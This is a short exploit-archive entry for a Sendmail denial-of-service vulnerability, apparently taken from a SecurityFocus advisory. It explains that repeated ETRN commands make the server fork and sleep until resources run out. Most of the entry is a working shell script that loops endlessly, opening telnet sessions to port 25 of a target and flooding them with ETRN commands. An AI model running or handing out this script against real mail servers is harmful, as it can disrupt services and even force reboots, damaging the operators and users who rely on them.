source: http://www.securityfocus.com/bid/904/info There is a low-bandwidth dos vulnerability in Sendmail. When a client connects to the sendmail smtpd and sends an ETRN command to the server, the server fork()s and sleeps for 5 seconds. If many ETRN commands are sent to a server, it is possible to exhaust system resources and cause a denial of service or even a reboot of the server. #!/bin/sh TARGET=localhost COUNT=150 SLEEP=1 echo "gurghfrbl.sh - (c) lcamtuf '99" echo -n "Tickle" while :; do echo -n "." ( NIC=0 while [ "$NIC" -lt "$COUNT" ]; do echo "ETRN x" done ) | telnet $TARGET 25 &>/dev/null & sleep $SLEEP killall -9 telnet &>/dev/null done